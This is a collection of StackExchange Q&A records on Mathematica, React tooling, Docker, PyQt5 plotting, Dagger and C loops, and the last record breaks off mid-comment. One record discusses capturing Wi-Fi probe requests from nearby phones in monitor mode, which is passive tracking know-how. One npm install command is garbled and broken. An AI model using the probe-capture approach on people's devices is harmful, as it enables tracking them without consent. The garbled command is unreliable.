involves a finite sum:\n$$\\int_{-\\infty}^{\\infty}\\sum_{j=1}^n (e^{-b t^2}r_j) \\,dt$$\nI think it should be possible to take the exponent outside the sum:\n$$\\int_{-\\infty}^{\\infty}\\left(e^{-b t^2} \\sum_{j=1}^n r_j \\right)dt=\\sum_{j=1}^n r_j \\times \\int_{-\\infty}^{\\infty}e^{-b t^2} dt$$\nI write it in Mathematica like this:\n<code>$Assumptions=_\\[Element]Reals\nAssuming[\nb>0,\nIntegrate[Sum[Exp[-b t^2]*r[j],{j,1,n}],{t,-\\[Infinity],+\\[Infinity]}]\n]\n<\/code>\nThis, however, simply returns the integral unchanged:\n$$\\int_{-\\infty }^{\\infty } \\left(\\sum _{j=1}^n e^{-b t^2} r(j)\\right)\\, dt$$\nIf I specify a number for $n$, I get the expected result:\n$$\\frac{\\sqrt{\\pi } (r(1)+r(2)+r(3)+r(4)+r(5))}{\\sqrt{b}}$$\n\nHow do I extract $e^{-bt^2}$ outside the sum? Alternatively, how do I bring the integral inside the sum? More generally, how do I integrate this?\nComment: @Domen, this is a simplified example. I actually have a bigger expression that'll get really long if I extract everything manually. I could probably integrate this by hand, but I was hoping that Mathematica can automate this for me.\nComment: This is a Mathematica limitation. Sorry.\nComment: Why don't you move it outside yourself? ``Sum[r[j], {j, 1, n}]*Integrate[Exp[-b t^2], {t, -\\[Infinity], +\\[Infinity]}]``\nComment: `Simplify` and `FullSimplify` also can't bring a constant factor outside the sum: `FullSimplify[Sum[a*Indexed[r, j], {j, 1, n}]]` returns the sum of `a*r_j` (as opposed. to `a` times the sum of `r_j`), but specifying a number instead of `n` correctly produces `a*(r_1+r_2+...)`\nComment: I think the reason is that you can exchange sum and integrate if the sum is known to be finite. See [when-can-a-sum-and-integral-be-interchanged](https:\/\/math.stackexchange.com\/questions\/83721\/when-can-a-sum-and-integral-be-interchanged\/83747) and here Mathematica does not know the sum is finite of not, because it does not know `r[j]` is finite. For example, if you replace `r[j]` with just `j` then it works. `ClearAll[b,n,j,r,t];\nf[t_]:=Sum[Exp[-b t^2]*j,{j,1,n}];\nAssuming[Element[b,Reals]&&b>0,Integrate[f[t],t]]` and gives `(n*(1 + n)*Sqrt[Pi]*Erf[Sqrt[b]*t])\/(4*Sqrt[b])` ...\nComment: .. so if someone can figure how to tell Mathematica that the sum is `finite` or `r[j]` is finite, then may be there will be a better chance to have it work.\nComment: @Nesser, I tried adding assumptions like `Indexed[r, j] > 0 && Indexed[r, j] < 1` to both the sum and the integral, but this didn't change anything. I also tried adding `n > 0 && n < 6` to these assumptions to indicate that the sum is finite, but this didn't help either...\nAnswer: Using <code>linearExpand<\/code> from How to do algebra on unevaluated integrals? :\n<code>Clear[linearExpand];\nlinearExpand[e_, x_, head_] := \n e \/\/. {op : head[arg_Plus, __] :> Distribute[op], \n head[arg1_Times, rest__] :> \n With[{dependencies = Internal`DependsOnQ[#, x] & \/@ List @@ arg1}, \n Pick[arg1, dependencies, False] head[\n Pick[arg1, dependencies, True], rest]]};\n\nlinearExpand[Sum[Exp[-b t^2]*r[j], {j, 1, n}], j, Sum]\n<\/code>\n\n<code>Assuming[b > 0,\n Integrate[\n linearExpand[Sum[Exp[-b t^2]*r[j], {j, 1, n}], j, Sum],\n {t, -\\[Infinity], +\\[Infinity]}]\n ]\n<\/code>\nAnswer: Use a replacement <code>Rule<\/code> to swap the order when appropriate.\n<code>Clear[\"Global`*\"]\n\nswap = Integrate[Sum[f_, iter1_, opts1___], iter2_, opts2___] :> \n Sum[Integrate[f, iter2, opts2], iter1, opts1];\n\nexpr[n_Integer?Positive] = Assuming[b > 0, (Integrate[\n Sum[Exp[-b t^2]*r[j], {j, 1, n}], {t, -\u221e, +\u221e}] \/. swap)]\n\n(* Sum[(Sqrt[Pi]*r[j])\/Sqrt[b], {j, 1, n}] *)\n\nexpr[5] \/\/ Simplify\n\n(* (Sqrt[\u03c0] (r[1] + r[2] + r[3] + r[4] + r[5]))\/Sqrt[b] *)\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"How to integrate a symbolic sum?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Catching Probe Requests using monitor mode in Raspberry pi 3\n\nQuestion: I wanna catch probe requests of mobile devices that are not connected to a network using monitor mode on Raspberry pi 3. I am using Raspbian OS. I used \"Wifite\" command but it only shows the mac addresses of access points and not of the non connected mobile device. I am a beginner in networking and Raspberry pi. Kindly guide me which commands should I use for this purpose?\nAnswer: You might try looking into sniff-probes.\nIt switches WiFi channels every two seconds and captures incoming packets using <code>tcpdump<\/code>.\n","meta":{"source":"stackoverflow","title":"Catching Probe Requests using monitor mode in Raspberry pi 3","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to update Jest testing framework in create-react-app?\n\nQuestion: I already have an application created with <code>create-react-app<\/code> package.\nI found a bug with the version of Jest which is 15.1.1. But I realized that in version 16 the bug is gone.\nHow to update Jest?\nMy problem is in the package.json of application there is no Jest package.\nJest is in other folder: node_modules\/react-scripts.\nAnswer: Create React App updates its dependencies once they are stable enough. This usually means waiting a week or two after the new release.\nWe don't recommend updating anything by yourself unless this is absolutely critical. If you choose to eject to update something we recommend making it a single commit so that you can revert it later once Create React App uses that version internally. \nComment: Currently Create React App uses Jest 24, which is a year old. Is one week not a thing anymore?\nComment: When can we expect CRA to start using Jest 26?\nComment: This doesn't answer the question. Wait a week and then do what?\nAnswer: The following commands are going to get the job done:\n<code>npm run eject\nnpm install --save-dev firstname.lastname@example.com\n<\/code>\nBut be careful here! The <code>eject<\/code> command irreversibly eliminates the abstraction layer of <code>create-react-app<\/code> exposing all of the dependencies and configuration to you. Though, your app is going to work just like before. You'll just have total control upon it, including the ability to update dependencies.\n","meta":{"source":"stackoverflow","title":"How to update Jest testing framework in create-react-app?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Portainer - how to add local path to a volume in docker compose\n\nQuestion: I'm trying to do a basic configuration with Portainer but I can't get my volumes to connect properly. I'm trying a relatively simple configuration as you can see but I get an error when I try this:\n<code>version: '3'\n\nnetworks:\n frontend:\n backend:\n \nservices:\n app:\n image: webdevops\/apache:alpine\n container_name: app\n volumes:\n - \"\/my\/host\/absolute\/path\/data: \/var\/www\"\n networks:\n - frontend\n php:\n image: php:fpm-alpine\n container_name: php\n networks:\n - backend\n db:\n image: mariadb\n container_name: db\n volumes:\n - \"\/my\/host\/absolute\/path\/storage: \/var\/lib\/mysql\"\n networks:\n - backend\n<\/code>\nCould you give me a hand to make this configuration work which would make me a good little starting point to learn to setup the rest correctly.\nAll I can find in the documentation is how to link named volumes but I don't see how to link them to a folder on my local computer so I'm not really advanced with this information...\nComment: Are there spaces after the colons in the `volumes:` blocks? Try deleting those; `\/host\/path:\/container\/path` with no whitespace. You also might be able to simplify this setup by removing unnecessary options like `container_name:` and `networks:`.\nAnswer: Use \"\/var\/lib...\"\nYou need to create a volume and after you can access it by using \/var\/lib\/docker\/volumes\/myVolume\/_data\nIf you are on Windows and you use wsl$ go to your file explorer and use this path : \\\\wsl.localhost\\docker-desktop-data\\version-pack-data\\community\\docker\\volumes to find all your existing volumes. You can past every file you want in your volumes and access it in Portainer.\nif you follow this steps, you're exemple should look like:\n<code>version: '3'\n\nnetworks:\n frontend:\n backend:\n\nservices:\n app:\n image: webdevops\/apache:alpine\n container_name: app\n volumes:\n - \"\/var\/lib\/docker\/volumes\/myAppVolume\/_data: \/var\/www\"\n networks:\n - frontend\n php:\n image: php:fpm-alpine\n container_name: php\n networks:\n - backend\n db:\n image: mariadb\n container_name: db\n volumes:\n - \"\/var\/lib\/docker\/volumes\/myStorageVolume\/_data: \/var\/lib\/mysql\"\n networks:\n - backend\n<\/code>\n","meta":{"source":"stackoverflow","title":"Portainer - how to add local path to a volume in docker compose","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to embed MetPy SkewT plot in PyQt5\n\nQuestion: I want to embed a MetPy SkewT diagram in a PyQT5 GUI. The following code creates a SkewT diagram:\n<code>import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\nimport metpy.calc as mpcalc\nfrom metpy.cbook import get_test_data\nfrom metpy.plots import SkewT\nfrom metpy.units import units\n\n###########################################\n\n# Change default to be better for skew-T\nplt.rcParams['figure.figsize'] = (9, 9)\n\n###########################################\n\n# Upper air data can be obtained using the siphon package, but for this example we will use\n# some of MetPy's sample data.\n\ncol_names = ['pressure', 'height', 'temperature', 'dewpoint', 'direction', 'speed']\n\ndf = pd.read_fwf(get_test_data('jan20_sounding.txt', as_file_obj=False),\n skiprows=5, usecols=[0, 1, 2, 3, 6, 7], names=col_names)\n\n# Drop any rows with all NaN values for T, Td, winds\ndf = df.dropna(subset=('temperature', 'dewpoint', 'direction', 'speed'\n ), how='all').reset_index(drop=True)\n\n###########################################\n# We will pull the data out of the example dataset into individual variables and\n# assign units.\n\np = df['pressure'].values * units.hPa\nT = df['temperature'].values * units.degC\nTd = df['dewpoint'].values * units.degC\nwind_speed = df['speed'].values * units.knots\nwind_dir = df['direction'].values * units.degrees\nu, v = mpcalc.wind_components(wind_speed, wind_dir)\n\n###########################################\n\nskew = SkewT()\n\n# Plot the data using normal plotting functions, in this case using\n# log scaling in Y, as dictated by the typical meteorological plot\nskew.plot(p, T, 'r')\nskew.plot(p, Td, 'g')\n\n# Set spacing interval--Every 50 mb from 1000 to 100 mb\nmy_interval = np.arange(100, 1000, 50) * units('mbar')\n\n# Get indexes of values closest to defined interval\nix = mpcalc.resample_nn_1d(p, my_interval)\n\n# Plot only values nearest to defined interval values\nskew.plot_barbs(p[ix], u[ix], v[ix])\n\n# Add the relevant special lines\nskew.plot_dry_adiabats()\nskew.plot_moist_adiabats()\nskew.plot_mixing_lines()\nskew.ax.set_ylim(1000, 100)\n\n# Show the plot\nplt.show()\n<\/code>\nThe result is similar to the image below:\n\nI have tried different codes for embedding this SkewT diagram in PyQt5 GUI using <code>FigureCanvasQTAgg()<\/code>. One of the efforts is as follows:\n<code>from PyQt5 import QtGui, QtCore\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QWidget, QVBoxLayout\nimport sys\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar\nfrom matplotlib.figure import Figure\nimport pandas as pd\n\nimport metpy.calc as mpcalc\nfrom metpy.cbook import get_test_data\nfrom metpy.plots import SkewT\nfrom metpy.units import units\n\nclass Window(QMainWindow):\n def __init__(self):\n super().__init__()\n \n widget=QWidget()\n vbox=QVBoxLayout()\n widget.setLayout(vbox)\n \n plot1 = FigureCanvas(Figure(tight_layout=True, linewidth=3))\n ax1 = plot1.figure.subplots()\n\n ###########################################\n\n # Upper air data can be obtained using the siphon package, but for this example we will use\n # some of MetPy's sample data.\n\n col_names = ['pressure', 'height', 'temperature', 'dewpoint', 'direction', 'speed']\n\n df = pd.read_fwf(get_test_data('jan20_sounding.txt', as_file_obj=False),\n skiprows=5, usecols=[0, 1, 2, 3, 6, 7], names=col_names)\n\n # Drop any rows with all NaN values for T, Td, winds\n df = df.dropna(subset=('temperature', 'dewpoint', 'direction', 'speed'\n ), how='all').reset_index(drop=True)\n\n ###########################################\n # We will pull the data out of the example dataset into individual variables and\n # assign units.\n\n p = df['pressure'].values * units.hPa\n T = df['temperature'].values * units.degC\n Td = df['dewpoint'].values * units.degC\n wind_speed = df['speed'].values * units.knots\n wind_dir = df['direction'].values * units.degrees\n u, v = mpcalc.wind_components(wind_speed, wind_dir)\n\n ###########################################\n\n skew = SkewT(ax1)\n\n # Plot the data using normal plotting functions, in this case using\n # log scaling in Y, as dictated by the typical meteorological plot\n skew.plot(p, T, 'r')\n skew.plot(p, Td, 'g')\n skew.plot_barbs(p, u, v)\n\n # Add the relevant special lines\n skew.plot_dry_adiabats()\n skew.plot_moist_adiabats()\n skew.plot_mixing_lines()\n skew.ax.set_ylim(1000, 100)\n\n self.setCentralWidget(widget)\n self.setWindowTitle('Example')\n self.setMinimumSize(1000, 600)\n # self.showMaximized()\n self.show()\n\nApp = QApplication(sys.argv)\nwindow = Window()\nsys.exit(App.exec())\n<\/code>\nBut it gives some errors.\nAnswer: Here's a slightly different approach that doesn't use PyQt5, but does use PySide2 as the Python Qt5 binding:\n<code>from PySide2 import QtWidgets, QtCore\n\nfrom matplotlib.backends.backend_qt5agg import (\n FigureCanvas, NavigationToolbar2QT as NavigationToolbar)\n\nimport metpy.calc as mpcalc\nfrom metpy.plots import SkewT\nfrom metpy.units import pandas_dataframe_to_unit_arrays\nfrom siphon.simplewebservice.wyoming import WyomingUpperAir\n\nclass ApplicationWindow(QtWidgets.QMainWindow):\n def __init__(self):\n super().__init__()\n self._main = QtWidgets.QWidget()\n self.setCentralWidget(self._main)\n mainLayout = QtWidgets.QHBoxLayout(self._main)\n\n self.skew = SkewT()\n self.skew.ax.set_ylim(1050, 100)\n self.skew.ax.set_xlim(-50, 40)\n self.skew.plot_dry_adiabats()\n self.skew.plot_moist_adiabats()\n self.skew.plot_mixing_lines()\n self._temp_line, = self.skew.plot([], [], 'tab:red')\n self._dewp_line, = self.skew.plot([], [], 'tab:blue')\n self._prof_line, = self.skew.plot([], [], 'black')\n\n self._canvas = FigureCanvas(self.skew.ax.figure)\n mainLayout.addWidget(self._canvas, stretch=0)\n\n configLayout = QtWidgets.QGridLayout()\n\n updateButton = QtWidgets.QPushButton('Update')\n updateButton.clicked.connect(self._update_data)\n configLayout.addWidget(updateButton, 4, 1)\n configLayout.setRowStretch(3, 1)\n\n configLayout.addWidget(QtWidgets.QLabel('Site:'), 0, 0)\n self._site_select = QtWidgets.QLineEdit('OUN')\n configLayout.addWidget(self._site_select, 0, 1)\n\n configLayout.addWidget(QtWidgets.QLabel('Date:'), 1, 0)\n self._date_select = QtWidgets.QDateTimeEdit(QtCore.QDateTime(2019, 3, 20, 12, 0, 0))\n configLayout.addWidget(self._date_select, 1, 1)\n\n self._parcel_check = QtWidgets.QCheckBox('Surface Parcel')\n self._parcel_check.toggled.connect(self._handle_prof)\n configLayout.addWidget(self._parcel_check, 2, 0)\n\n mainLayout.addLayout(configLayout, stretch=1)\n\n self._update_data()\n self._handle_prof()\n\n @QtCore.Slot()\n def _update_data(self):\n try:\n print(self._date_select.dateTime().toPython(), self._site_select.text())\n self._data = WyomingUpperAir.request_data(self._date_select.dateTime().toPython(),\n self._site_select.text())\n self._data = pandas_dataframe_to_unit_arrays(self._data)\n self._temp_line.set_data(self._data['temperature'].m, self._data['pressure'].m)\n self._dewp_line.set_data(self._data['dewpoint'].m, self._data['pressure'].m)\n self.flush()\n except ValueError as e:\n print(e)\n\n def flush(self):\n self._canvas.draw()\n self._main.repaint()\n\n @QtCore.Slot()\n def _handle_prof(self):\n if self._parcel_check.isChecked():\n prof_press, _, _, prof_temp = mpcalc.parcel_profile_with_lcl(self._data['pressure'],\n self._data['temperature'],\n self._data['dewpoint'])\n self._prof_line.set_data(prof_temp.to('degC').m, prof_press.to('hPa').m)\n else:\n self._prof_line.set_data([], [])\n\n self.flush()\n\nif __name__ == \"__main__\":\n import sys\n\n qapp = QtWidgets.QApplication(sys.argv)\n app = ApplicationWindow()\n app.show()\n qapp.exec_()\n<\/code>\nAnswer: I suggest you to create a separate python file <code>ui.py<\/code> where you set up your <code>PyQt5<\/code> window, with widgets, layout etc. I use Qt Designer for this purpose.\nYou should organize your working directory as:\n<code>\u251c\u2500\u2500 workind_directory\n \u251c\u2500\u2500 main.py\n \u2514\u2500\u2500 ui.py\n<\/code>\nA starting point for the <code>ui.py<\/code> file could be:\n<code>from PyQt5 import QtCore, QtGui, QtWidgets\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow):\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(600, 600)\n MainWindow.setMinimumSize(QtCore.QSize(600, 600))\n self.centralwidget = QtWidgets.QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)\n self.gridLayout.setObjectName(\"gridLayout\")\n self.FigureLayout = QtWidgets.QVBoxLayout()\n self.FigureLayout.setObjectName(\"FigureLayout\")\n self.gridLayout.addLayout(self.FigureLayout, 0, 0, 1, 1)\n self.ToolbarLayout = QtWidgets.QVBoxLayout()\n self.ToolbarLayout.setObjectName(\"ToolbarLayout\")\n self.gridLayout.addLayout(self.ToolbarLayout, 1, 0, 1, 1)\n self.plotButton = QtWidgets.QPushButton(self.centralwidget)\n self.plotButton.setObjectName(\"plotButton\")\n self.gridLayout.addWidget(self.plotButton, 2, 0, 1, 1)\n MainWindow.setCentralWidget(self.centralwidget)\n self.plotButton.setText(\"PLOT\")\n<\/code>\nwhere you have a layout for the plot, another layout for the toolbar (if needed) and a button for update the plot.\nThen you can setup your <code>main.py<\/code> file:\n<code>from PyQt5.QtWidgets import QApplication, QMainWindow\nimport sys\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar\nimport pandas as pd\nimport numpy as np\nimport ui\nimport matplotlib.pyplot as plt\n\nimport metpy.calc as mpcalc\nfrom metpy.cbook import get_test_data\nfrom metpy.plots import SkewT\nfrom metpy.units import units\n\nclass Window(QMainWindow, ui.Ui_MainWindow):\n\n def __init__(self, parent = None):\n\n super(Window, self).__init__(parent)\n self.setupUi(self)\n\n self.plotButton.clicked.connect(self.plotting)\n\n self.Figure = plt.figure()\n self.Canvas = FigureCanvas(self.Figure)\n self.FigureLayout.addWidget(self.Canvas)\n self.Toolbar = NavigationToolbar(self.Canvas, self)\n self.ToolbarLayout.addWidget(self.Toolbar)\n\n def plotting(self):\n\n ###########################################\n\n # Upper air data can be obtained using the siphon package, but for this example we will use\n # some of MetPy's sample data.\n\n col_names = ['pressure', 'height', 'temperature', 'dewpoint', 'direction', 'speed']\n\n df = pd.read_fwf(get_test_data('jan20_sounding.txt', as_file_obj = False),\n skiprows = 5, usecols = [0, 1, 2, 3, 6, 7], names = col_names)\n\n # Drop any rows with all NaN values for T, Td, winds\n df = df.dropna(subset = ('temperature', 'dewpoint', 'direction', 'speed'\n ), how = 'all').reset_index(drop = True)\n\n ###########################################\n # We will pull the data out of the example dataset into individual variables and\n # assign units.\n\n p = df['pressure'].values*units.hPa\n T = df['temperature'].values*units.degC\n Td = df['dewpoint'].values*units.degC\n wind_speed = df['speed'].values*units.knots\n wind_dir = df['direction'].values*units.degrees\n u, v = mpcalc.wind_components(wind_speed, wind_dir)\n\n ###########################################\n\n skew = SkewT(fig = self.Figure)\n\n # Plot the data using normal plotting functions, in this case using\n # log scaling in Y, as dictated by the typical meteorological plot\n skew.plot(p, T, 'r')\n skew.plot(p, Td, 'g')\n # skew.plot_barbs(p, u, v)\n\n # Set spacing interval--Every 50 mb from 1000 to 100 mb\n my_interval = np.arange(100, 1000, 50) * units('mbar')\n\n # Get indexes of values closest to defined interval\n ix = mpcalc.resample_nn_1d(p, my_interval)\n\n # Plot only values nearest to defined interval values\n skew.plot_barbs(p[ix], u[ix], v[ix])\n\n # Add the relevant special lines\n skew.plot_dry_adiabats()\n skew.plot_moist_adiabats()\n skew.plot_mixing_lines()\n skew.ax.set_ylim(1000, 100)\n\n plt.draw()\n\nApp = QApplication(sys.argv)\nwindow = Window()\nwindow.show()\nsys.exit(App.exec_())\n<\/code>\nThis <code>main.py<\/code> file inherits layout from <code>ui.py<\/code>. Pay attention to the <code>__init__()<\/code> method, where figure, canvas, toolbar are created and placed in the respective layouts.\nThen there is the <code>plotting()<\/code> method, where you actually draw the plot you want.\nComment: I updated my answer: there was a little bug. I forgot to pass `fig = self.Figure` parameter to `skew = SkewT()`. Now it should work properly\nComment: Thanks for your advice about structured programming. But my point in asking this question is to understand how to embed a MetPy SkewT (not anything else) diagram in a PyQt5 GUI. I have tried your code, but the SkewT diagram does not appear after clicking.\n","meta":{"source":"stackoverflow","title":"How to embed MetPy SkewT plot in PyQt5","dup_signals":{}},"subset":"stackexchange"} +{"text":"No injector was found for fragment dagger 2.11\n\nQuestion: i have an Activity with one fragment. I am trying to inject the fragment but i am getting 'No injector was found for com.tsiro.dogvip.login.signin.SignInFrgmt' exception.\nActivityModule:\n<code>@Module(includes = BaseActivityModule.class)\npublic abstract class LoginActivityModule {\n\n @PerFragment\n @ContributesAndroidInjector(modules = SignInFragmentModule.class)\n abstract SignInFrgmt signInFrgmtInjector();\n\n @Binds\n @PerActivity\n abstract Activity activity(LoginActivity loginActivity);\n}\n<\/code>\nFragmentModule:\n<code>@Module(includes = BaseFragmentModule.class)\npublic abstract class SignInFragmentModule {\n\n@Binds\n@Named(BaseFragmentModule.FRAGMENT)\n@PerFragment\nabstract Fragment fragment(SignInFrgmt signInFrgmt);\n\n}\n<\/code>\nFragment class extends BaseFragment where HasSupportFragmentInjector is implemented.\nBaseFragment:\n<code>public abstract class BaseFragment extends Fragment implements HasSupportFragmentInjector, Lifecycle.View {\n\n@Inject\nDispatchingAndroidInjector<Fragment> fragmentInjector;\npublic abstract Lifecycle.ViewModel getViewModel();\n\n@SuppressWarnings(\"deprecation\")\n@Override\npublic void onAttach(Activity activity) {\n if (Build.VERSION.SDK_INT < Build.VERSION_CODES.M) {\n \/\/ Perform injection here before M, L (API 22) and below because onAttach(Context)\n \/\/ is not yet available at L.\n AndroidSupportInjection.inject(this);\n }\n super.onAttach(activity);\n}\n\n@Override\npublic void onAttach(Context context) {\n if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.M) {\n \/\/ Perform injection here for M (API 23) due to deprecation of onAttach(Activity).\n AndroidSupportInjection.inject(this);\n }\n super.onAttach(context);\n}\n\n@Override\npublic void onStart() {\n super.onStart();\n getViewModel().onViewAttached(this);\n}\n\n@Override\npublic void onResume() {\n super.onResume();\n getViewModel().onViewResumed();\n}\n\n@Override\npublic void onPause() {\n super.onPause();\n}\n\n@Override\npublic void onStop() {\n super.onStop();\n getViewModel().onViewDetached();\n}\n\n@Override\npublic AndroidInjector<Fragment> supportFragmentInjector() {\n return fragmentInjector;\n}\n\n }\n<\/code>\nCan anybody tell me what i am missing?\nComment: When is your fragment injected in the above code?\nAnswer: The problem with your code, is the incorrect implementation of the interface <code>HasSupportFragmentInjector<\/code> or <code>HasFragmentInjector<\/code> (it depends on whether you are using the support library for fragments or not).\nYou should implement this interface either in your Activity that is hosting the fragment, or in your Application class. Personally, I 'd recommend the following Application class so you don't bother implementing it on every Activity that hosts a Fragment:\n<code>public class MyApplication extends Application implements HasActivityInjector, HasSupportFragmentInjector {\n\n @Inject\n DispatchingAndroidInjector<Activity> mActivityInjector;\n\n @Inject\n DispatchingAndroidInjector<Fragment> mFragmentInjector;\n\n @Override\n public void onCreate() {\n super.onCreate();\n\n \/\/The way you build your top-level Application component can vary. This is just an example\n DaggerApplicationComponent.builder()\n .application(this)\n .build()\n .inject(this);\n\n }\n\n @Override\n public AndroidInjector<Activity> activityInjector() {\n return mActivityInjector;\n }\n\n @Override\n public AndroidInjector<Fragment> supportFragmentInjector() {\n return mFragmentInjector;\n }\n}\n<\/code>\nAnd then in you inject your Fragments (as you already do in your code):\n<code>@Override\npublic void onAttach(Context context) {\n AndroidSupportInjection.inject(this);\n super.onAttach(context);\n}\n<\/code>\nIf the above is not working, make sure you have created the appropriate Components\/Subcomponents for the screen you are trying to inject. If you are using <code>@ContributesAndroidInjector<\/code> instead of manually defining components, make sure you have one entry for your screen in your binding Module:\n<code>@ContributesAndroidInjector(modules = MyScreenModule.class)\nabstract MyScreenActivity bindMyScreen();<\/code>\nIf you still can't get it to work. I recommend reading the actual Dagger documentation: \nHope it helps.\nComment: Doesn't work for me, my error message is slightly different: `java.lang.IllegalArgumentException: No injector factory bound for Class<...MyFragment>` . :( I already have `supportFragmentInjector()` in my `Application` subclass\nComment: Don't forget to add `MyApplication ` to AndroidMnifest that was my undoing.\nComment: I'm facing the same problem. Hope to get it solved and post the solution soon.\nComment: Don't forget to add `MyApplication ` to AndroidMnifest that was my undoing.\nAnswer: In my case,\nMy <code>Fragment<\/code> already extends <code>DaggerFragment<\/code>.\nHowever, my <code>Activity<\/code> extends <code>AppCompatActivity<\/code> and I got error \n<code>No injector was found for fragment dagger<\/code>\nIt quite strange because the error is mention about <code>Fragment<\/code> and without using fragment, the Activity still work fine\nChange <code>Activity<\/code> extends <code>DaggerAppCompatActivity<\/code> make it work\nComment: This saved my day!\nComment: I got this error: No injector factory bound for Class xxx\nComment: Fixed by adding ActivityModule, refer to this answer please: https:\/\/stackoverflow.com\/a\/45327464\/3260008\nComment: I'm using dagger 2.21\nAnswer: I fixed this bug. First , extend your fragment with DaggerFragment\n<code>class BaseFragment : DaggerFragment(){}\n<\/code>\nAfter, add the onAttach method in the same Fragment :\n<code> override fun onAttach(context: Context?) {\n AndroidSupportInjection.inject(this)\n super.onAttach(context)\n}\n<\/code>\nPS: I'm using Kotlin.\nAnswer: When I use dagger version <code>2.26<\/code> that problem happened, then I change dagger version to <code>2.23.2<\/code> ten it work. Try to use 2.23.2 vesion:\n<code>implementation \"com.google.dagger:dagger-android-support:2.23.2\"\n<\/code>\n","meta":{"source":"stackoverflow","title":"No injector was found for fragment dagger 2.11","dup_signals":{}},"subset":"stackexchange"} +{"text":"Remove a term which includes a defined variable from an equation\n\nQuestion: Is it possible to remove a term which includes a defined variable from an equation?\nmy equation is something like:\n<code>qq := {a*b^2*FIinAlpha31''''[t] + 2*c*d*e*cos (FIinAlpha32[t])}\n<\/code>\nand I want to remove the term which includes <code>FIinAlpha31''''[t]<\/code>, so the result whould be \n<code>+2*c*d*e*cos (FIinAlpha32[t])\n<\/code>\nI tried <code>deleteWith<\/code> and <code>DeleteCases<\/code>, but none of them gave the result I'm after.\nI appreciate any help.\nI can derive the term which includes <code>FIinAlpha31''''[t]<\/code> with <code>Coefficient<\/code> if it's needed\nAnswer: Just:\n<code>qq \/. FIinAlpha31''''[t] -> 0\n<\/code>\nComment: this does not work, when sending equations from matlab, to remove in mathematica.\nAnswer: <code>qq := {a*b^2*FIinAlpha31''''[t] + 2*c*d*e*cos (FIinAlpha32[t])}\n\nqq \/. Derivative[_][_][_] -> 0\n\n(* {3\/2 c cos d FIinAlpha32[t]} *)\n<\/code>\nOr\n<code>Cases[qq, _?(FreeQ[#, Derivative] &), {2}]\n\n(* {3\/2 c cos d FIinAlpha32[t]} *)\n<\/code>\nOr\n<code>DeleteCases[qq, _?(! FreeQ[#, Derivative] &), {2}]\n\n(* {3\/2 c cos d FIinAlpha32[t]} *)\n<\/code>\nComment: I have other derivatives in my equation too, this was the simplest example I have. So I cannot specify if there is derivative remove that.\nComment: You can replace one or more blanks with values to make it as specific as necessary.\n","meta":{"source":"mathematica.stackexchange","title":"Remove a term which includes a defined variable from an equation","dup_signals":{}},"subset":"stackexchange"} +{"text":"Can I combine two for statements into one?\n\nQuestion: This a simpler proof-of-concept for comparing pins on a microcontroller and I am trying to work out the basics of this code before moving to the microcontroller IDE. In this code each element of the array is a pin and the values of the array elements are compared. My code achieves what I want it to do, but I am trying to simplify it so It is not multiple print lines and instead counts how many of the pins are the same value and can print what pins are the same and what those same pin values are.\n<code>#include<stdio.h>\n\nint main(){\n \nint count1=0;\n\n\/\/array represents pins, values range from 1 to 8. NOT COUNTING ARRAY ELEMENT 0.\nint arrNew[]={0,1,1,2,6,7,3,4,3,4,5,8};\n\n\/\/FOR LOOPS TO COMPARE EACH PIN TO EACH OTHER.\nfor(int i = 1; i < 12; i++)\nfor(int k = i; k < 12; k++)\n\n\/\/PRINT IF PINS ARE NOT THE SAME\n if(arrNew[i] != arrNew[k]){\n \n printf(\"\\nPin %d is not the same as %d.\", arrNew[i], arrNew[k]);\n }\n}\n<\/code>\nCurrently I am trying to create a counter for each time an array element value is a certain number, but I am getting an error of 'k' not declared in my for statement.\n<code>#include<stdio.h>\n\nint main(){\n \nint count1=0;\n\n\/\/array represents pins, values range from 1 to 8. NOT COUNTING ARRAY ELEMENT 0.\nint arrNew[]={0,1,1,2,6,7,3,4,3,4,5,8};\n\n\/\/FOR LOOPS TO COMPARE EACH PIN TO EACH OTHER.\nfor(int i = 1; i < 12; i++)\nfor(int k = i; k < 12; k++)\n\n\/\/PRINT IF PINS ARE NOT THE SAME\n if(arrNew[i] != arrNew[k]){\n \n printf(\"\\nPin %d is not the same as %d.\", arrNew[i], arrNew[k]);\n }\n \n\/\/keep count of WHAT pins are of the same value, and what VALUE those same pins are. \n if (arrNew[k]=1){\n count1++;\n }\n}\n<\/code>\n<code>21 13 C:\\Users\\xxxx\\Desktop\\dev c\\Untitled1.cpp [Error] 'k' was not declared in this scope\n<\/code>\nWould combining the two FOR statements allow me to access the value of int k as it is updated through the FOR loop in order to keep count of how many array element values are 1, 2, etc..?\nComment: Use `{}` brackets around the bodies of each of your `for` loops. Otherwise it's ambiguous.\nComment: I'm voting to close this question until I see code that is indented in a way that shows OP:s intent.\nComment: Also use indentation to show what you mean (and think) your code does. Currently - your indentation shows that you don't understand what your code does.\nComment: `if (arrNew[k]=1){` ... Do you mean to assign 1 to each element of the array? When you've cleared-up the errors, pay attention to the compiler warmings... BTW, you seem to want to compare two different elements. Either you need two loops, or you'll have to devise some arcane way to have two discrete indices.\nComment: @Iguananaut, I did try this, but when using `{}` around the body of the second `for` loop it does not work properly with the first `for` loop.\nComment: You're _not_ getting full\/correct coverage with your `for` loops. You want: `for (int i = 0; i < (12 - 1); i++) for (int k = i + 1; k < 12; k++)`\nComment: @Fe2O3, Thank you for pointing that out. You are correct.\nComment: @deadlight446 `if( arrNew[ k ] = 1 ) {` Make friends with whitespace to make your code more readable... I quickly scanned that line in your source 2-3 times before spotting the bug... And, as suggested by Iguananaut, use indent and curly braces to show the 